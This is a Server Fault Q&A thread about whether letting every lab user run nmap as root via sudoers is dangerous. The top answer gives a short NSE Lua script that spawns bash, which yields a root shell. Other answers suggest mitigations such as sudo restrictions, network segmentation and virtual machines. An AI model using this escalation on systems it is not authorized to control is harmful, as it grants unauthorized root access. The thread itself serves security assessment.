# Is it dangerous to allow every user to run nmap as root?

Tags: linux, security, root, sudo, nmap

At our university we have some computers in the "networking lab", that are configured to allow everybody to run nmap as root via /etc/sudoers. Could this be a security vulnerability?

Answer (score 4):

I just found out that nmap let's the user run arbitrary lua scripts. You can get a root shell with this lua script:

```
description = [[]]
author = ""
license = ""
categories = {}

portrule = function(host, port)
os.execute("bash")
return false
end

action = function(host, port)

end
```

Comment: Also, any updates you have should be put into your question or added as comments to your question, not as answers like this. Stackoverflow isn't a forum; it's a Q and A site.

Comment: @romandas the rules for SF explicitly allow answering your own question, which I just did. When I posted the question I didn't think it would be that easy.
@romandas thanks for your answer

Comment: At the time of my comment, you had only posted what appeared to be a comment, not an answer, on your own question. Obviously you've edited it since then. :)

Comment: +1 for the code and confirming the potential vulnerability via the NSE.

Comment: I'm not surprised by this. Many times a vulnerability is simply part of what the application is meant to do, used in nefarious ways. Even something as simple as an authorized file upload capability can lead to denial-of-service and code execution by those same personnel.

Answer (score 3):

There are a few areas of potential vulnerability:

1. If the users are able to scan a
   production-type network, there is
   the potential for causing
   denial-of-service problems for
   various services and systems. This
   is not specifically a vulnerability
   of running nmap as root however;
   this is just the nature of the tool.
   Sandbox the scanned network
   accordingly and you'll be fine.
2. If there are security bugs in the
   nmap application itself, then yes,
   there could be vulnerabilities.
   Check bugtraq and the full
   disclosure mailing lists for these.
   Make sure you're using the latest
   version of stable nmap (I don't
   recommend using beta versions of
   anything for anything serious) and
   you should be fine.
3. Lastly, if someone was able to plant
   a malicious Lua script that could be
   run by the nmap scripting engine
   (NSE), then there is the potential
   for that script to be run as root. Shell access can be gained via the NSE; see [Kim's answer](https://serverfault.com/questions/130946/is-it-dangerous-to-allow-every-user-to-run-nmap-as-root/130963#130963) for details.

Of the three, the 2nd and 3rd are the ones that will be amplified by running as root. *The issues will still remain as a general user*; the vulnerabilities will be limited to the extent that the general user has access.

You can restrict what nmap options that can be used via the sudo config file to try and mitigate #3 by not allowing the users to utilize the NSE. Of course, if they need access to the NSE to accomplish their educational goals, then you'll likely have to accept the risk.

Answer (score 1):

Letting users use computers *could be* a security vulnerability. Most "hacks" are inside jobs.

Anyway, nmap could be a security problem no matter what. A hammer builds houses, it also puts holes in skulls. Depends on the user and intent.

Chances are nmap in the school will be used 99% of the time the way it's intended for a learning environment. I think you almost have to allow it some root access since you're playing with ports below 1024.

The problem is that these can be used to "audit" other computers on your network.

If you want to limit the damage, consider
a) partition off the labs at the switch from being able to portscan other computers outside the lab, or selectively allow services outside the lab to be scanned or accessed if these are general usage labs.
B) run nmap on virtualized machines that the students can configure and customize but be easily wiped, maybe by ssh'ing into a virtualized student server that gives them more access. This lets you centralize management a bit better and they can do things using XLiveCD on Windows or any Linux environment on the lab computers.

Nmap can also put a strain on any network. If you have a lab of 20 machines simultaneously portscanning other machines at the same time you're going to be pushing a lot of traffic through the switches...hope they've got the horsepower to handle it or you're going to see some weird stuff.

Comment: +1 For the two limit damages recommendations, my thoughts exactly.